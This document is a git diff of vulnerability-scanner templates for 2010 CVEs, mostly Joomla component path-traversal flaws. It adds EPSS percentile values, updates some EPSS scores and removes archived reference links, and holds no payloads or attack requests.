index eb4aa14aa1..d6e3c28d00 100644
--- a/http/cves/2010/CVE-2010-1340.yaml
+++ b/http/cves/2010/CVE-2010-1340.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.01155
cpe: cpe:2.3:a:joomla-research:com_jresearch:*:*:*:*:*:*:*:*
+ epss-percentile: 0.8306
metadata:
max-request: 1
vendor: joomla-research
diff --git a/http/cves/2010/CVE-2010-1345.yaml b/http/cves/2010/CVE-2010-1345.yaml
index bb173a095e..468389f448 100644
--- a/http/cves/2010/CVE-2010-1345.yaml
+++ b/http/cves/2010/CVE-2010-1345.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.00477
cpe: cpe:2.3:a:cookex:com_ckforms:1.3.3:*:*:*:*:*:*:*
+ epss-percentile: 0.72681
metadata:
max-request: 1
vendor: cookex
diff --git a/http/cves/2010/CVE-2010-1352.yaml b/http/cves/2010/CVE-2010-1352.yaml
index 7dd39e516c..53aff88ca4 100644
--- a/http/cves/2010/CVE-2010-1352.yaml
+++ b/http/cves/2010/CVE-2010-1352.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.00477
cpe: cpe:2.3:a:jooforge:com_jukebox:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.72681
metadata:
max-request: 1
vendor: jooforge
diff --git a/http/cves/2010/CVE-2010-1353.yaml b/http/cves/2010/CVE-2010-1353.yaml
index f23ad6a672..4ac76de77b 100644
--- a/http/cves/2010/CVE-2010-1353.yaml
+++ b/http/cves/2010/CVE-2010-1353.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.01751
cpe: cpe:2.3:a:wowjoomla:com_loginbox:*:*:*:*:*:*:*:*
+ epss-percentile: 0.86395
metadata:
max-request: 1
vendor: wowjoomla
diff --git a/http/cves/2010/CVE-2010-1354.yaml b/http/cves/2010/CVE-2010-1354.yaml
index c488906b3b..e5c008b4b7 100644
--- a/http/cves/2010/CVE-2010-1354.yaml
+++ b/http/cves/2010/CVE-2010-1354.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.00477
cpe: cpe:2.3:a:ternaria:com_vjdeo:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.72681
metadata:
max-request: 1
vendor: ternaria
diff --git a/http/cves/2010/CVE-2010-1429.yaml b/http/cves/2010/CVE-2010-1429.yaml
index 9e9e2bcccb..c60d6e1a89 100644
--- a/http/cves/2010/CVE-2010-1429.yaml
+++ b/http/cves/2010/CVE-2010-1429.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-264
epss-score: 0.00573
cpe: cpe:2.3:a:redhat:jboss_enterprise_application_platform:*:cp08:*:*:*:*:*:*
+ epss-percentile: 0.75122
metadata:
max-request: 1
shodan-query: title:"JBoss"
diff --git a/http/cves/2010/CVE-2010-1461.yaml b/http/cves/2010/CVE-2010-1461.yaml
index 6e58f61607..66b851ad39 100644
--- a/http/cves/2010/CVE-2010-1461.yaml
+++ b/http/cves/2010/CVE-2010-1461.yaml
@@ -8,7 +8,6 @@ info:
reference:
- https://www.exploit-db.com/exploits/12232
- https://nvd.nist.gov/vuln/detail/CVE-2010-1461
- - http://web.archive.org/web/20210518110953/https://www.securityfocus.com/bid/39504
- http://www.exploit-db.com/exploits/12232
remediation: Upgrade to a supported version.
classification:
@@ -18,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.00477
cpe: cpe:2.3:a:gogoritas:com_photobattle:1.0.1:*:*:*:*:*:*:*
+ epss-percentile: 0.72681
metadata:
max-request: 1
vendor: gogoritas
diff --git a/http/cves/2010/CVE-2010-1469.yaml b/http/cves/2010/CVE-2010-1469.yaml
index b35273a45e..f6f72c62b6 100644
--- a/http/cves/2010/CVE-2010-1469.yaml
+++ b/http/cves/2010/CVE-2010-1469.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.00813
cpe: cpe:2.3:a:ternaria:com_jprojectmanager:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.79614
metadata:
max-request: 1
vendor: ternaria
diff --git a/http/cves/2010/CVE-2010-1470.yaml b/http/cves/2010/CVE-2010-1470.yaml
index 2d405862c0..f2b0e3ea81 100644
--- a/http/cves/2010/CVE-2010-1470.yaml
+++ b/http/cves/2010/CVE-2010-1470.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.04616
cpe: cpe:2.3:a:dev.pucit.edu.pk:com_webtv:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.915
metadata:
max-request: 1
vendor: dev.pucit.edu.pk
diff --git a/http/cves/2010/CVE-2010-1471.yaml b/http/cves/2010/CVE-2010-1471.yaml
index 45fd20e8d8..0aa2c1efaa 100644
--- a/http/cves/2010/CVE-2010-1471.yaml
+++ b/http/cves/2010/CVE-2010-1471.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-22
epss-score: 0.05684
cpe: cpe:2.3:a:b-elektro:com_addressbook:1.5.0:*:*:*:*:*:*:*
+ epss-percentile: 0.92341
metadata:
max-request: 1
vendor: b-elektro
diff --git a/http/cves/2010/CVE-2010-1472.yaml b/http/cves/2010/CVE-2010-1472.yaml
index 2c601b7227..535d357eaa 100644
--- a/http/cves/2010/CVE-2010-1472.yaml
+++ b/http/cves/2010/CVE-2010-1472.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.05684
cpe: cpe:2.3:a:kazulah:com_horoscope:1.5.0:*:*:*:*:*:*:*
+ epss-percentile: 0.92341
metadata:
max-request: 1
vendor: kazulah
diff --git a/http/cves/2010/CVE-2010-1473.yaml b/http/cves/2010/CVE-2010-1473.yaml
index 83d5c8eb2c..25649c6daf 100644
--- a/http/cves/2010/CVE-2010-1473.yaml
+++ b/http/cves/2010/CVE-2010-1473.yaml
@@ -9,7 +9,6 @@ info:
- https://www.exploit-db.com/exploits/12171
- https://nvd.nist.gov/vuln/detail/CVE-2010-1473
- http://packetstormsecurity.org/1004-exploits/joomlaeasyadbanner-lfi.txt
- - http://web.archive.org/web/20140723213338/http://secunia.com/advisories/39410/
remediation: Upgrade to a supported version.
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
@@ -18,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.00826
cpe: cpe:2.3:a:johnmccollum:com_advertising:0.25:*:*:*:*:*:*:*
+ epss-percentile: 0.79783
metadata:
max-request: 1
vendor: johnmccollum
diff --git a/http/cves/2010/CVE-2010-1474.yaml b/http/cves/2010/CVE-2010-1474.yaml
index c16f307708..c1435e2dce 100644
--- a/http/cves/2010/CVE-2010-1474.yaml
+++ b/http/cves/2010/CVE-2010-1474.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.01242
cpe: cpe:2.3:a:supachai_teasakul:com_sweetykeeper:*:*:*:*:*:*:*:*
+ epss-percentile: 0.83796
metadata:
max-request: 1
vendor: supachai_teasakul
diff --git a/http/cves/2010/CVE-2010-1475.yaml b/http/cves/2010/CVE-2010-1475.yaml
index 9e25e172a1..0ee5dfc572 100644
--- a/http/cves/2010/CVE-2010-1475.yaml
+++ b/http/cves/2010/CVE-2010-1475.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.01242
cpe: cpe:2.3:a:ternaria:com_preventive:1.0.5:*:*:*:*:*:*:*
+ epss-percentile: 0.83796
metadata:
max-request: 1
vendor: ternaria
diff --git a/http/cves/2010/CVE-2010-1476.yaml b/http/cves/2010/CVE-2010-1476.yaml
index 8dc0b6ec8b..f984bbb180 100644
--- a/http/cves/2010/CVE-2010-1476.yaml
+++ b/http/cves/2010/CVE-2010-1476.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.03527
cpe: cpe:2.3:a:alphaplug:com_alphauserpoints:1.5.5:*:*:*:*:*:*:*
+ epss-percentile: 0.90353
metadata:
max-request: 1
vendor: alphaplug
diff --git a/http/cves/2010/CVE-2010-1478.yaml b/http/cves/2010/CVE-2010-1478.yaml
index c8fcbbfd39..545620e7e5 100644
--- a/http/cves/2010/CVE-2010-1478.yaml
+++ b/http/cves/2010/CVE-2010-1478.yaml
@@ -8,8 +8,6 @@ info:
reference:
- https://www.exploit-db.com/exploits/12145
- https://nvd.nist.gov/vuln/detail/CVE-2010-1478
- - http://web.archive.org/web/20140723205157/http://secunia.com/advisories/39262/
- - http://web.archive.org/web/20210121195422/https://www.securityfocus.com/bid/39390/
remediation: Upgrade to a supported version.
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
@@ -18,6 +16,7 @@ info:
cwe-id: CWE-22
epss-score: 0.00826
cpe: cpe:2.3:a:ternaria:com_jfeedback:1.2:*:*:*:*:*:*:*
+ epss-percentile: 0.79783
metadata:
max-request: 1
vendor: ternaria
diff --git a/http/cves/2010/CVE-2010-1491.yaml b/http/cves/2010/CVE-2010-1491.yaml
index e36dccc99c..6a7f36b307 100644
--- a/http/cves/2010/CVE-2010-1491.yaml
+++ b/http/cves/2010/CVE-2010-1491.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.00477
cpe: cpe:2.3:a:mms.pipp:com_mmsblog:2.3.0:*:*:*:*:*:*:*
+ epss-percentile: 0.72681
metadata:
max-request: 1
vendor: mms.pipp
diff --git a/http/cves/2010/CVE-2010-1494.yaml b/http/cves/2010/CVE-2010-1494.yaml
index 210518cbc9..4ee5643791 100644
--- a/http/cves/2010/CVE-2010-1494.yaml
+++ b/http/cves/2010/CVE-2010-1494.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-22
epss-score: 0.02305
cpe: cpe:2.3:a:awdsolution:com_awdwall:1.5.4:*:*:*:*:*:*:*
+ epss-percentile: 0.88291
metadata:
max-request: 1
vendor: awdsolution
diff --git a/http/cves/2010/CVE-2010-1495.yaml b/http/cves/2010/CVE-2010-1495.yaml
index a8e06a82a6..f508d03731 100644
--- a/http/cves/2010/CVE-2010-1495.yaml
+++ b/http/cves/2010/CVE-2010-1495.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.04503
cpe: cpe:2.3:a:matamko:com_matamko:1.01:*:*:*:*:*:*:*
+ epss-percentile: 0.91406
metadata:
max-request: 1
vendor: matamko
diff --git a/http/cves/2010/CVE-2010-1531.yaml b/http/cves/2010/CVE-2010-1531.yaml
index 32a6dbac86..f0253a9139 100644
--- a/http/cves/2010/CVE-2010-1531.yaml
+++ b/http/cves/2010/CVE-2010-1531.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-22
epss-score: 0.01815
cpe: cpe:2.3:a:redcomponent:com_redshop:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.8667
metadata:
max-request: 1
vendor: redcomponent
diff --git a/http/cves/2010/CVE-2010-1532.yaml b/http/cves/2010/CVE-2010-1532.yaml
index 496e8df0ed..b196f3401a 100644
--- a/http/cves/2010/CVE-2010-1532.yaml
+++ b/http/cves/2010/CVE-2010-1532.yaml
@@ -9,7 +9,6 @@ info:
- https://www.exploit-db.com/exploits/12118
- https://nvd.nist.gov/vuln/detail/CVE-2010-1532
- http://packetstormsecurity.org/1004-exploits/joomlapowermail-lfi.txt
- - http://web.archive.org/web/20210127202836/https://www.securityfocus.com/bid/39348/
remediation: Upgrade to a supported version.
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
@@ -18,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.00477
cpe: cpe:2.3:a:givesight:com_powermail:1.53:*:*:*:*:*:*:*
+ epss-percentile: 0.72681
metadata:
max-request: 1
vendor: givesight
diff --git a/http/cves/2010/CVE-2010-1533.yaml b/http/cves/2010/CVE-2010-1533.yaml
index 3d96cbf44c..d920fcd682 100644
--- a/http/cves/2010/CVE-2010-1533.yaml
+++ b/http/cves/2010/CVE-2010-1533.yaml
@@ -8,7 +8,6 @@ info:
reference:
- https://www.exploit-db.com/exploits/12142
- https://nvd.nist.gov/vuln/detail/CVE-2010-1533
- - http://web.archive.org/web/20140723212810/http://secunia.com/advisories/39258/
- http://www.exploit-db.com/exploits/12142
remediation: Upgrade to a supported version.
classification:
@@ -18,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.00706
cpe: cpe:2.3:a:peter_hocherl:com_tweetla:1.0.1:*:*:*:*:*:*:*
+ epss-percentile: 0.77913
metadata:
max-request: 1
vendor: peter_hocherl
diff --git a/http/cves/2010/CVE-2010-1534.yaml b/http/cves/2010/CVE-2010-1534.yaml
index e528940f57..7d8b130dc8 100644
--- a/http/cves/2010/CVE-2010-1534.yaml
+++ b/http/cves/2010/CVE-2010-1534.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 5
cve-id: CVE-2010-1534
cwe-id: CWE-22
- epss-score: 0.02437
+ epss-score: 0.01733
cpe: cpe:2.3:a:joomla.batjo:com_shoutbox:*:*:*:*:*:*:*:*
+ epss-percentile: 0.86312
metadata:
max-request: 1
vendor: joomla.batjo
diff --git a/http/cves/2010/CVE-2010-1535.yaml b/http/cves/2010/CVE-2010-1535.yaml
index 9d59954d04..1ff777c473 100644
--- a/http/cves/2010/CVE-2010-1535.yaml
+++ b/http/cves/2010/CVE-2010-1535.yaml
@@ -8,7 +8,6 @@ info:
reference:
- https://www.exploit-db.com/exploits/12151
- https://nvd.nist.gov/vuln/detail/CVE-2010-1535
- - http://web.archive.org/web/20140725030342/http://secunia.com/advisories/39254/
- http://www.exploit-db.com/exploits/12151
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
@@ -17,6 +16,7 @@ info:
cwe-id: CWE-22
epss-score: 0.00706
cpe: cpe:2.3:a:peter_hocherl:com_travelbook:1.0.1:*:*:*:*:*:*:*
+ epss-percentile: 0.77913
metadata:
max-request: 1
vendor: peter_hocherl
diff --git a/http/cves/2010/CVE-2010-1540.yaml b/http/cves/2010/CVE-2010-1540.yaml
index 84b63947ce..9c1d30b875 100644
--- a/http/cves/2010/CVE-2010-1540.yaml
+++ b/http/cves/2010/CVE-2010-1540.yaml
@@ -8,8 +8,6 @@ info:
reference:
- https://www.exploit-db.com/exploits/11625
- https://nvd.nist.gov/vuln/detail/CVE-2010-1540
- - http://web.archive.org/web/20140721042709/http://secunia.com/advisories/38777/
- - http://web.archive.org/web/20210121194559/https://www.securityfocus.com/bid/38530/
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cvss-score: 5
@@ -17,6 +15,7 @@ info:
cwe-id: CWE-22
epss-score: 0.0045
cpe: cpe:2.3:a:myblog:com_myblog:3.0.329:*:*:*:*:*:*:*
+ epss-percentile: 0.71928
metadata:
max-request: 1
vendor: myblog
diff --git a/http/cves/2010/CVE-2010-1586.yaml b/http/cves/2010/CVE-2010-1586.yaml
index bb34d34313..3f61382602 100644
--- a/http/cves/2010/CVE-2010-1586.yaml
+++ b/http/cves/2010/CVE-2010-1586.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 4.3
cve-id: CVE-2010-1586
cwe-id: CWE-20
- epss-score: 0.00841
+ epss-score: 0.00846
cpe: cpe:2.3:a:hp:system_management_homepage:2.0.0:*:*:*:*:*:*:*
+ epss-percentile: 0.80024
metadata:
max-request: 1
vendor: hp
diff --git a/http/cves/2010/CVE-2010-1601.yaml b/http/cves/2010/CVE-2010-1601.yaml
index 9368434e9f..69eca79e6a 100644
--- a/http/cves/2010/CVE-2010-1601.yaml
+++ b/http/cves/2010/CVE-2010-1601.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.01299
cpe: cpe:2.3:a:joomlamart:com_jacomment:*:*:*:*:*:*:*:*
+ epss-percentile: 0.84165
metadata:
max-request: 1
vendor: joomlamart
diff --git a/http/cves/2010/CVE-2010-1602.yaml b/http/cves/2010/CVE-2010-1602.yaml
index bfb5899ba6..a0e9f38a38 100644
--- a/http/cves/2010/CVE-2010-1602.yaml
+++ b/http/cves/2010/CVE-2010-1602.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.03451
cpe: cpe:2.3:a:zimbllc:com_zimbcomment:0.8.1:*:*:*:*:*:*:*
+ epss-percentile: 0.90259
metadata:
max-request: 1
vendor: zimbllc
diff --git a/http/cves/2010/CVE-2010-1603.yaml b/http/cves/2010/CVE-2010-1603.yaml
index f845705a61..e38324c988 100644
--- a/http/cves/2010/CVE-2010-1603.yaml
+++ b/http/cves/2010/CVE-2010-1603.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.03451
cpe: cpe:2.3:a:zimbllc:com_zimbcore:0.1:*:*:*:*:*:*:*
+ epss-percentile: 0.90259
metadata:
max-request: 1
vendor: zimbllc
diff --git a/http/cves/2010/CVE-2010-1607.yaml b/http/cves/2010/CVE-2010-1607.yaml
index 8a6311343e..de5ddacd08 100644
--- a/http/cves/2010/CVE-2010-1607.yaml
+++ b/http/cves/2010/CVE-2010-1607.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-22
epss-score: 0.01726
cpe: cpe:2.3:a:paysyspro:com_wmi:1.5.0:*:*:*:*:*:*:*
+ epss-percentile: 0.8629
metadata:
max-request: 1
vendor: paysyspro
diff --git a/http/cves/2010/CVE-2010-1653.yaml b/http/cves/2010/CVE-2010-1653.yaml
index 2d28834831..50eeb93344 100644
--- a/http/cves/2010/CVE-2010-1653.yaml
+++ b/http/cves/2010/CVE-2010-1653.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.03527
cpe: cpe:2.3:a:htmlcoderhelper:com_graphics:1.0.6:*:*:*:*:*:*:*
+ epss-percentile: 0.90353
metadata:
max-request: 1
vendor: htmlcoderhelper
diff --git a/http/cves/2010/CVE-2010-1657.yaml b/http/cves/2010/CVE-2010-1657.yaml
index 035fc9455b..f2c8f58e97 100644
--- a/http/cves/2010/CVE-2010-1657.yaml
+++ b/http/cves/2010/CVE-2010-1657.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.01751
cpe: cpe:2.3:a:recly:com_smartsite:1.0.0:*:*:*:*:*:*:*
+ epss-percentile: 0.86395
metadata:
max-request: 1
vendor: recly
diff --git a/http/cves/2010/CVE-2010-1658.yaml b/http/cves/2010/CVE-2010-1658.yaml
index 79960b5666..212fb17e91 100644
--- a/http/cves/2010/CVE-2010-1658.yaml
+++ b/http/cves/2010/CVE-2010-1658.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.01751
cpe: cpe:2.3:a:code-garage:com_noticeboard:1.3:*:*:*:*:*:*:*
+ epss-percentile: 0.86395
metadata:
max-request: 1
vendor: code-garage
diff --git a/http/cves/2010/CVE-2010-1659.yaml b/http/cves/2010/CVE-2010-1659.yaml
index fcf1555354..358072a619 100644
--- a/http/cves/2010/CVE-2010-1659.yaml
+++ b/http/cves/2010/CVE-2010-1659.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.01806
cpe: cpe:2.3:a:webkul:com_ultimateportfolio:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.86644
metadata:
max-request: 1
vendor: webkul
diff --git a/http/cves/2010/CVE-2010-1714.yaml b/http/cves/2010/CVE-2010-1714.yaml
index dc6c25110d..2d39aef4f3 100644
--- a/http/cves/2010/CVE-2010-1714.yaml
+++ b/http/cves/2010/CVE-2010-1714.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.01751
cpe: cpe:2.3:a:dev.pucit.edu.pk:com_arcadegames:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.86395
metadata:
max-request: 1
vendor: dev.pucit.edu.pk
diff --git a/http/cves/2010/CVE-2010-1715.yaml b/http/cves/2010/CVE-2010-1715.yaml
index bb94c2bbae..55e50e91be 100644
--- a/http/cves/2010/CVE-2010-1715.yaml
+++ b/http/cves/2010/CVE-2010-1715.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.01242
cpe: cpe:2.3:a:pucit.edu:com_onlineexam:1.5.0:*:*:*:*:*:*:*
+ epss-percentile: 0.83796
metadata:
max-request: 1
vendor: pucit.edu
diff --git a/http/cves/2010/CVE-2010-1717.yaml b/http/cves/2010/CVE-2010-1717.yaml
index 7fba0e1949..a60fa9da2e 100644
--- a/http/cves/2010/CVE-2010-1717.yaml
+++ b/http/cves/2010/CVE-2010-1717.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-22
epss-score: 0.01733
cpe: cpe:2.3:a:if_surfalert_project:if_surfalert:1.2:*:*:*:*:joomla\!:*:*
+ epss-percentile: 0.86313
metadata:
max-request: 1
framework: joomla\!
diff --git a/http/cves/2010/CVE-2010-1718.yaml b/http/cves/2010/CVE-2010-1718.yaml
index f1048f6958..72f57440af 100644
--- a/http/cves/2010/CVE-2010-1718.yaml
+++ b/http/cves/2010/CVE-2010-1718.yaml
@@ -8,8 +8,6 @@ info:
reference:
- https://www.exploit-db.com/exploits/12282
- https://nvd.nist.gov/vuln/detail/CVE-2010-1718
- - http://web.archive.org/web/20140805094212/http://secunia.com/advisories/39521/
- - http://web.archive.org/web/20210121195621/https://www.securityfocus.com/bid/39545/
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
cvss-score: 6.8
@@ -17,6 +15,7 @@ info:
cwe-id: CWE-22
epss-score: 0.00826
cpe: cpe:2.3:a:lispeltuut:com_archeryscores:1.0.6:*:*:*:*:*:*:*
+ epss-percentile: 0.79783
metadata:
max-request: 1
vendor: lispeltuut
diff --git a/http/cves/2010/CVE-2010-1719.yaml b/http/cves/2010/CVE-2010-1719.yaml
index 5eb702c332..b8b2eed9cb 100644
--- a/http/cves/2010/CVE-2010-1719.yaml
+++ b/http/cves/2010/CVE-2010-1719.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.01671
cpe: cpe:2.3:a:moto-treks:com_mtfireeagle:1.2:*:*:*:*:*:*:*
+ epss-percentile: 0.86069
metadata:
max-request: 1
vendor: moto-treks
diff --git a/http/cves/2010/CVE-2010-1722.yaml b/http/cves/2010/CVE-2010-1722.yaml
index f423093ed6..e44750678d 100644
--- a/http/cves/2010/CVE-2010-1722.yaml
+++ b/http/cves/2010/CVE-2010-1722.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.01242
cpe: cpe:2.3:a:dev.pucit.edu.pk:com_market:2.0:*:*:*:*:*:*:*
+ epss-percentile: 0.83796
metadata:
max-request: 1
vendor: dev.pucit.edu.pk
diff --git a/http/cves/2010/CVE-2010-1723.yaml b/http/cves/2010/CVE-2010-1723.yaml
index 8fffaead73..7836a7fa59 100644
--- a/http/cves/2010/CVE-2010-1723.yaml
+++ b/http/cves/2010/CVE-2010-1723.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.01956
cpe: cpe:2.3:a:joomlacomponent.inetlanka:com_drawroot:1.1:*:*:*:*:*:*:*
+ epss-percentile: 0.87217
metadata:
max-request: 1
vendor: joomlacomponent.inetlanka
diff --git a/http/cves/2010/CVE-2010-1858.yaml b/http/cves/2010/CVE-2010-1858.yaml
index 845055c6be..7851861622 100644
--- a/http/cves/2010/CVE-2010-1858.yaml
+++ b/http/cves/2010/CVE-2010-1858.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.01155
cpe: cpe:2.3:a:gelembjuk:com_smestorage:*:*:*:*:*:*:*:*
+ epss-percentile: 0.8306
metadata:
max-request: 1
vendor: gelembjuk
diff --git a/http/cves/2010/CVE-2010-1870.yaml b/http/cves/2010/CVE-2010-1870.yaml
index c57eaff005..a36ecbf3f5 100644
--- a/http/cves/2010/CVE-2010-1870.yaml
+++ b/http/cves/2010/CVE-2010-1870.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 5
cve-id: CVE-2010-1870
cwe-id: CWE-917
- epss-score: 0.03864
+ epss-score: 0.04227
cpe: cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:*
+ epss-percentile: 0.91141
metadata:
max-request: 2
vendor: apache
diff --git a/http/cves/2010/CVE-2010-1875.yaml b/http/cves/2010/CVE-2010-1875.yaml
index 93313a230d..3808bf9a68 100644
--- a/http/cves/2010/CVE-2010-1875.yaml
+++ b/http/cves/2010/CVE-2010-1875.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2010-1875
cwe-id: CWE-22
- epss-score: 0.01724
+ epss-score: 0.01222
cpe: cpe:2.3:a:com-property:com_properties:3.1.22-03:*:*:*:*:*:*:*
+ epss-percentile: 0.83609
metadata:
max-request: 1
vendor: com-property
diff --git a/http/cves/2010/CVE-2010-1878.yaml b/http/cves/2010/CVE-2010-1878.yaml
index 16a6c6778b..5deb57ea92 100644
--- a/http/cves/2010/CVE-2010-1878.yaml
+++ b/http/cves/2010/CVE-2010-1878.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.00826
cpe: cpe:2.3:a:blueflyingfish.no-ip:com_orgchart:1.0.0:*:*:*:*:*:*:*
+ epss-percentile: 0.79783
metadata:
max-request: 1
vendor: blueflyingfish.no-ip
diff --git a/http/cves/2010/CVE-2010-1952.yaml b/http/cves/2010/CVE-2010-1952.yaml
index 47ac9294fe..f9d06dcfb5 100644
--- a/http/cves/2010/CVE-2010-1952.yaml
+++ b/http/cves/2010/CVE-2010-1952.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.01242
cpe: cpe:2.3:a:cmstactics:com_beeheard:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.83796
metadata:
max-request: 1
vendor: cmstactics
diff --git a/http/cves/2010/CVE-2010-1953.yaml b/http/cves/2010/CVE-2010-1953.yaml
index acfb3dd5c0..7d5993de55 100644
--- a/http/cves/2010/CVE-2010-1953.yaml
+++ b/http/cves/2010/CVE-2010-1953.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.05684
cpe: cpe:2.3:a:joomlacomponent.inetlanka:com_multimap:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.92341
metadata:
max-request: 1
vendor: joomlacomponent.inetlanka
diff --git a/http/cves/2010/CVE-2010-1954.yaml b/http/cves/2010/CVE-2010-1954.yaml
index 4d1be5522d..26488bc163 100644
--- a/http/cves/2010/CVE-2010-1954.yaml
+++ b/http/cves/2010/CVE-2010-1954.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.05684
cpe: cpe:2.3:a:joomlacomponent.inetlanka:com_multiroot:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.92341
metadata:
max-request: 1
vendor: joomlacomponent.inetlanka
diff --git a/http/cves/2010/CVE-2010-1955.yaml b/http/cves/2010/CVE-2010-1955.yaml
index 158a2512c2..6195fdb597 100644
--- a/http/cves/2010/CVE-2010-1955.yaml
+++ b/http/cves/2010/CVE-2010-1955.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.01671
cpe: cpe:2.3:a:thefactory:com_blogfactory:1.1.2:*:*:*:*:*:*:*
+ epss-percentile: 0.86069
metadata:
max-request: 1
vendor: thefactory
diff --git a/http/cves/2010/CVE-2010-1956.yaml b/http/cves/2010/CVE-2010-1956.yaml
index 96cfb215e2..3465aa8905 100644
--- a/http/cves/2010/CVE-2010-1956.yaml
+++ b/http/cves/2010/CVE-2010-1956.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-22
epss-score: 0.06055
cpe: cpe:2.3:a:thefactory:com_gadgetfactory:1.0.0:*:*:*:*:*:*:*
+ epss-percentile: 0.92545
metadata:
max-request: 1
vendor: thefactory
diff --git a/http/cves/2010/CVE-2010-1957.yaml b/http/cves/2010/CVE-2010-1957.yaml
index ef07a880c9..87ed17ab11 100644
--- a/http/cves/2010/CVE-2010-1957.yaml
+++ b/http/cves/2010/CVE-2010-1957.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.01671
cpe: cpe:2.3:a:thefactory:com_lovefactory:1.3.4:*:*:*:*:*:*:*
+ epss-percentile: 0.86069
metadata:
max-request: 1
vendor: thefactory
diff --git a/http/cves/2010/CVE-2010-1977.yaml b/http/cves/2010/CVE-2010-1977.yaml
index efbe552f45..6ced19f464 100644
--- a/http/cves/2010/CVE-2010-1977.yaml
+++ b/http/cves/2010/CVE-2010-1977.yaml
@@ -8,8 +8,6 @@ info:
reference:
- https://www.exploit-db.com/exploits/12083
- https://nvd.nist.gov/vuln/detail/CVE-2010-1977
- - http://web.archive.org/web/20210121195306/https://www.securityfocus.com/bid/39243/
- - http://web.archive.org/web/20140724201603/http://secunia.com/advisories/39356/
remediation: Upgrade to a supported version.
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
@@ -18,6 +16,7 @@ info:
cwe-id: CWE-22
epss-score: 0.00826
cpe: cpe:2.3:a:gohigheris:com_jwhmcs:1.5.0:*:*:*:*:*:*:*
+ epss-percentile: 0.79783
metadata:
max-request: 1
vendor: gohigheris
diff --git a/http/cves/2010/CVE-2010-1979.yaml b/http/cves/2010/CVE-2010-1979.yaml
index 07670c883b..fbb218acf8 100644
--- a/http/cves/2010/CVE-2010-1979.yaml
+++ b/http/cves/2010/CVE-2010-1979.yaml
